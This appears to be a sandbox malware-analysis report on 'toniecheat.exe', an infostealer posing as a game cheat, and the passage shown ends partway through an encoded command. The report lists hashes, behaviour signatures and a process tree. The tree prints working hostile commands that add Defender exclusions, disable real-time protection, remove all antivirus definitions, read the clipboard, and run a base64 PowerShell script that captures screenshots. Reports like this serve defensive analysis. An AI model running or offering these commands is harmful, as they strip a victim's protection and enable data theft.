Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 22:34
Behavioral task
behavioral1
Sample
toniecheat.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
toniecheat.exe
Resource
win10v2004-20241007-en
General
-
Target
toniecheat.exe
-
Size
24.4MB
-
MD5
d107cbeaef45f5cd7ddbb0d88e683aef
-
SHA1
db2a52cefd9414a14ef3b31b9bddb4b290de71f0
-
SHA256
b63155f617da18b3d56a178921a60cffb4cfb227142ed2f9989ce52655969d72
-
SHA512
cce1a2066ccb44ead1990506115760a501b516e4df6facd33eaf4fd9728fef9e8705f59da607fb0ffe10e987fda06c73d053649bb54a619c6fc7d1833938da8d
-
SSDEEP
786432:/TEGs1OEi/UMnspKXk8BEWL11JDjszSljW21:m1Ob8YXvJv1Yza
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2952 powershell.exe 2172 powershell.exe 2500 powershell.exe 2612 powershell.exe 4564 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 2 IoCs
Processes:
bound.exerar.exepid Process 3116 bound.exe 2972 rar.exe -
Loads dropped DLL 18 IoCs
Processes:
toniecheat.exebound.exepid Process 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 2992 toniecheat.exe 3116 bound.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid Process 4996 tasklist.exe 1820 tasklist.exe 4716 tasklist.exe -
Processes:
resource yara_rule behavioral2/files/0x000a000000023b74-22.dat upx behavioral2/memory/2992-26-0x00007FFDD3320000-0x00007FFDD3909000-memory.dmp upx behavioral2/files/0x000a000000023b65-28.dat upx behavioral2/memory/2992-31-0x00007FFDE6360000-0x00007FFDE6383000-memory.dmp upx behavioral2/files/0x000a000000023b6c-49.dat upx behavioral2/files/0x000a000000023b6b-48.dat upx behavioral2/memory/2992-50-0x00007FFDEA7A0000-0x00007FFDEA7AF000-memory.dmp upx behavioral2/files/0x000a000000023b6a-47.dat upx behavioral2/files/0x000a000000023b69-46.dat upx behavioral2/files/0x000a000000023b68-45.dat upx behavioral2/files/0x000a000000023b67-44.dat upx behavioral2/files/0x000a000000023b66-43.dat upx behavioral2/files/0x000a000000023b64-42.dat upx behavioral2/files/0x000a000000023b79-41.dat upx behavioral2/files/0x000a000000023b78-40.dat upx behavioral2/files/0x000a000000023b77-39.dat upx behavioral2/files/0x000a000000023b73-36.dat upx behavioral2/files/0x000a000000023b71-35.dat upx behavioral2/files/0x000a000000023b72-30.dat upx behavioral2/memory/2992-58-0x00007FFDE27F0000-0x00007FFDE2809000-memory.dmp upx behavioral2/memory/2992-56-0x00007FFDE2B10000-0x00007FFDE2B3D000-memory.dmp upx behavioral2/memory/2992-60-0x00007FFDE26D0000-0x00007FFDE26F3000-memory.dmp upx behavioral2/memory/2992-62-0x00007FFDD2900000-0x00007FFDD2A77000-memory.dmp upx behavioral2/memory/2992-65-0x00007FFDE5E50000-0x00007FFDE5E69000-memory.dmp upx behavioral2/memory/2992-66-0x00007FFDE2C70000-0x00007FFDE2C7D000-memory.dmp upx behavioral2/memory/2992-73-0x00007FFDD2580000-0x00007FFDD28F8000-memory.dmp upx behavioral2/memory/2992-75-0x00007FFDE2830000-0x00007FFDE28E8000-memory.dmp upx behavioral2/memory/2992-80-0x00007FFDE2310000-0x00007FFDE231D000-memory.dmp upx behavioral2/memory/2992-79-0x00007FFDE2810000-0x00007FFDE2824000-memory.dmp upx behavioral2/memory/2992-77-0x00007FFDE6360000-0x00007FFDE6383000-memory.dmp upx behavioral2/memory/2992-72-0x00007FFDE28F0000-0x00007FFDE291E000-memory.dmp upx behavioral2/memory/2992-71-0x00007FFDD3320000-0x00007FFDD3909000-memory.dmp upx behavioral2/memory/2992-83-0x00007FFDE27F0000-0x00007FFDE2809000-memory.dmp upx behavioral2/memory/2992-84-0x00007FFDD3200000-0x00007FFDD331C000-memory.dmp upx behavioral2/memory/2992-98-0x00007FFDE26D0000-0x00007FFDE26F3000-memory.dmp upx behavioral2/memory/2992-119-0x00007FFDD2900000-0x00007FFDD2A77000-memory.dmp upx behavioral2/memory/2992-142-0x00007FFDE5E50000-0x00007FFDE5E69000-memory.dmp upx behavioral2/memory/2992-165-0x00007FFDD2580000-0x00007FFDD28F8000-memory.dmp upx behavioral2/memory/2992-172-0x00007FFDE28F0000-0x00007FFDE291E000-memory.dmp upx behavioral2/memory/2992-224-0x00007FFDE2830000-0x00007FFDE28E8000-memory.dmp upx behavioral2/memory/2992-250-0x00007FFDE6360000-0x00007FFDE6383000-memory.dmp upx behavioral2/memory/2992-249-0x00007FFDD3320000-0x00007FFDD3909000-memory.dmp upx behavioral2/memory/2992-263-0x00007FFDD3200000-0x00007FFDD331C000-memory.dmp upx behavioral2/memory/2992-255-0x00007FFDD2900000-0x00007FFDD2A77000-memory.dmp upx behavioral2/memory/2992-304-0x00007FFDE26D0000-0x00007FFDE26F3000-memory.dmp upx behavioral2/memory/2992-309-0x00007FFDE2310000-0x00007FFDE231D000-memory.dmp upx behavioral2/memory/2992-308-0x00007FFDE28F0000-0x00007FFDE291E000-memory.dmp upx behavioral2/memory/2992-307-0x00007FFDE2830000-0x00007FFDE28E8000-memory.dmp upx behavioral2/memory/2992-306-0x00007FFDE5E50000-0x00007FFDE5E69000-memory.dmp upx behavioral2/memory/2992-305-0x00007FFDD2900000-0x00007FFDD2A77000-memory.dmp upx behavioral2/memory/2992-303-0x00007FFDE27F0000-0x00007FFDE2809000-memory.dmp upx behavioral2/memory/2992-302-0x00007FFDE2B10000-0x00007FFDE2B3D000-memory.dmp upx behavioral2/memory/2992-301-0x00007FFDEA7A0000-0x00007FFDEA7AF000-memory.dmp upx behavioral2/memory/2992-300-0x00007FFDE6360000-0x00007FFDE6383000-memory.dmp upx behavioral2/memory/2992-299-0x00007FFDE2C70000-0x00007FFDE2C7D000-memory.dmp upx behavioral2/memory/2992-298-0x00007FFDD3200000-0x00007FFDD331C000-memory.dmp upx behavioral2/memory/2992-296-0x00007FFDE2810000-0x00007FFDE2824000-memory.dmp upx behavioral2/memory/2992-295-0x00007FFDD2580000-0x00007FFDD28F8000-memory.dmp upx behavioral2/memory/2992-284-0x00007FFDD3320000-0x00007FFDD3909000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exebound.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2612 powershell.exe 2612 powershell.exe 2952 powershell.exe 4564 powershell.exe 4564 powershell.exe 2952 powershell.exe 2952 powershell.exe 4296 powershell.exe 4296 powershell.exe 4564 powershell.exe 4564 powershell.exe 5072 powershell.exe 5072 powershell.exe 4296 powershell.exe 3116 bound.exe 3116 bound.exe 5072 powershell.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 2172 powershell.exe 2172 powershell.exe 3116 bound.exe 3116 bound.exe 4616 powershell.exe 4616 powershell.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 2500 powershell.exe 2500 powershell.exe 3116 bound.exe 3116 bound.exe 2960 powershell.exe 2960 powershell.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe 3116 bound.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeWMIC.exepowershell.exetasklist.exetasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 2612 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 4564 powershell.exe Token: SeIncreaseQuotaPrivilege 3304 WMIC.exe Token: SeSecurityPrivilege 3304 WMIC.exe Token: SeTakeOwnershipPrivilege 3304 WMIC.exe Token: SeLoadDriverPrivilege 3304 WMIC.exe Token: SeSystemProfilePrivilege 3304 WMIC.exe Token: SeSystemtimePrivilege 3304 WMIC.exe Token: SeProfSingleProcessPrivilege 3304 WMIC.exe Token: SeIncBasePriorityPrivilege 3304 WMIC.exe Token: SeCreatePagefilePrivilege 3304 WMIC.exe Token: SeBackupPrivilege 3304 WMIC.exe Token: SeRestorePrivilege 3304 WMIC.exe Token: SeShutdownPrivilege 3304 WMIC.exe Token: SeDebugPrivilege 3304 WMIC.exe Token: SeSystemEnvironmentPrivilege 3304 WMIC.exe Token: SeRemoteShutdownPrivilege 3304 WMIC.exe Token: SeUndockPrivilege 3304 WMIC.exe Token: SeManageVolumePrivilege 3304 WMIC.exe Token: 33 3304 WMIC.exe Token: 34 3304 WMIC.exe Token: 35 3304 WMIC.exe Token: 36 3304 WMIC.exe Token: SeIncreaseQuotaPrivilege 3304 WMIC.exe Token: SeSecurityPrivilege 3304 WMIC.exe Token: SeTakeOwnershipPrivilege 3304 WMIC.exe Token: SeLoadDriverPrivilege 3304 WMIC.exe Token: SeSystemProfilePrivilege 3304 WMIC.exe Token: SeSystemtimePrivilege 3304 WMIC.exe Token: SeProfSingleProcessPrivilege 3304 WMIC.exe Token: SeIncBasePriorityPrivilege 3304 WMIC.exe Token: SeCreatePagefilePrivilege 3304 WMIC.exe Token: SeBackupPrivilege 3304 WMIC.exe Token: SeRestorePrivilege 3304 WMIC.exe Token: SeShutdownPrivilege 3304 WMIC.exe Token: SeDebugPrivilege 3304 WMIC.exe Token: SeSystemEnvironmentPrivilege 3304 WMIC.exe Token: SeRemoteShutdownPrivilege 3304 WMIC.exe Token: SeUndockPrivilege 3304 WMIC.exe Token: SeManageVolumePrivilege 3304 WMIC.exe Token: 33 3304 WMIC.exe Token: 34 3304 WMIC.exe Token: 35 3304 WMIC.exe Token: 36 3304 WMIC.exe Token: SeDebugPrivilege 4296 powershell.exe Token: SeDebugPrivilege 4996 tasklist.exe Token: SeDebugPrivilege 1820 tasklist.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeDebugPrivilege 4716 tasklist.exe Token: SeDebugPrivilege 2172 powershell.exe Token: SeDebugPrivilege 4616 powershell.exe Token: SeIncreaseQuotaPrivilege 2768 WMIC.exe Token: SeSecurityPrivilege 2768 WMIC.exe Token: SeTakeOwnershipPrivilege 2768 WMIC.exe Token: SeLoadDriverPrivilege 2768 WMIC.exe Token: SeSystemProfilePrivilege 2768 WMIC.exe Token: SeSystemtimePrivilege 2768 WMIC.exe Token: SeProfSingleProcessPrivilege 2768 WMIC.exe Token: SeIncBasePriorityPrivilege 2768 WMIC.exe Token: SeCreatePagefilePrivilege 2768 WMIC.exe Token: SeBackupPrivilege 2768 WMIC.exe Token: SeRestorePrivilege 2768 WMIC.exe Token: SeShutdownPrivilege 2768 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
toniecheat.exetoniecheat.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exepowershell.execmd.execsc.exedescription pid Process procid_target PID 3224 wrote to memory of 2992 3224 toniecheat.exe 83 PID 3224 wrote to memory of 2992 3224 toniecheat.exe 83 PID 2992 wrote to memory of 2552 2992 toniecheat.exe 84 PID 2992 wrote to memory of 2552 2992 toniecheat.exe 84 PID 2992 wrote to memory of 3180 2992 toniecheat.exe 85 PID 2992 wrote to memory of 3180 2992 toniecheat.exe 85 PID 3180 wrote to memory of 2952 3180 cmd.exe 89 PID 3180 wrote to memory of 2952 3180 cmd.exe 89 PID 2992 wrote to memory of 3148 2992 toniecheat.exe 88 PID 2992 wrote to memory of 3148 2992 toniecheat.exe 88 PID 2552 wrote to memory of 2612 2552 cmd.exe 90 PID 2552 wrote to memory of 2612 2552 cmd.exe 90 PID 2992 wrote to memory of 2164 2992 toniecheat.exe 91 PID 2992 wrote to memory of 2164 2992 toniecheat.exe 91 PID 3148 wrote to memory of 4564 3148 cmd.exe 94 PID 3148 wrote to memory of 4564 3148 cmd.exe 94 PID 2164 wrote to memory of 3116 2164 cmd.exe 95 PID 2164 wrote to memory of 3116 2164 cmd.exe 95 PID 2992 wrote to memory of 2212 2992 toniecheat.exe 96 PID 2992 wrote to memory of 2212 2992 toniecheat.exe 96 PID 2992 wrote to memory of 724 2992 toniecheat.exe 97 PID 2992 wrote to memory of 724 2992 toniecheat.exe 97 PID 2992 wrote to memory of 3652 2992 toniecheat.exe 135 PID 2992 wrote to memory of 3652 2992 toniecheat.exe 135 PID 2992 wrote to memory of 3672 2992 toniecheat.exe 102 PID 2992 wrote to memory of 3672 2992 toniecheat.exe 102 PID 2992 wrote to memory of 2444 2992 toniecheat.exe 98 PID 2992 wrote to memory of 2444 2992 toniecheat.exe 98 PID 2992 wrote to memory of 5052 2992 toniecheat.exe 100 PID 2992 wrote to memory of 5052 2992 toniecheat.exe 100 PID 2992 wrote to memory of 3228 2992 toniecheat.exe 101 PID 2992 wrote to memory of 3228 2992 toniecheat.exe 101 PID 2992 wrote to memory of 1912 2992 toniecheat.exe 103 PID 2992 wrote to memory of 1912 2992 toniecheat.exe 103 PID 724 wrote to memory of 3304 724 cmd.exe 113 PID 724 wrote to memory of 3304 724 cmd.exe 113 PID 2212 wrote to memory of 4996 2212 cmd.exe 114 PID 2212 wrote to memory of 4996 2212 cmd.exe 114 PID 2444 wrote to memory of 5072 2444 cmd.exe 115 PID 2444 wrote to memory of 5072 2444 cmd.exe 115 PID 3672 wrote to memory of 4296 3672 cmd.exe 116 PID 3672 wrote to memory of 4296 3672 cmd.exe 116 PID 1912 wrote to memory of 1820 1912 cmd.exe 117 PID 1912 wrote to memory of 1820 1912 cmd.exe 117 PID 3228 wrote to memory of 4716 3228 cmd.exe 119 PID 3228 wrote to memory of 4716 3228 cmd.exe 119 PID 3652 wrote to memory of 1000 3652 cmd.exe 120 PID 3652 wrote to memory of 1000 3652 cmd.exe 120 PID 5052 wrote to memory of 1964 5052 cmd.exe 118 PID 5052 wrote to memory of 1964 5052 cmd.exe 118 PID 2992 wrote to memory of 1148 2992 toniecheat.exe 122 PID 2992 wrote to memory of 1148 2992 toniecheat.exe 122 PID 1148 wrote to memory of 2380 1148 cmd.exe 124 PID 1148 wrote to memory of 2380 1148 cmd.exe 124 PID 4296 wrote to memory of 540 4296 powershell.exe 125 PID 4296 wrote to memory of 540 4296 powershell.exe 125 PID 2992 wrote to memory of 4556 2992 toniecheat.exe 126 PID 2992 wrote to memory of 4556 2992 toniecheat.exe 126 PID 4556 wrote to memory of 744 4556 cmd.exe 128 PID 4556 wrote to memory of 744 4556 cmd.exe 128 PID 540 wrote to memory of 316 540 csc.exe 129 PID 540 wrote to memory of 316 540 csc.exe 129 PID 2992 wrote to memory of 4260 2992 toniecheat.exe 130 PID 2992 wrote to memory of 4260 2992 toniecheat.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\toniecheat.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\toniecheat.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH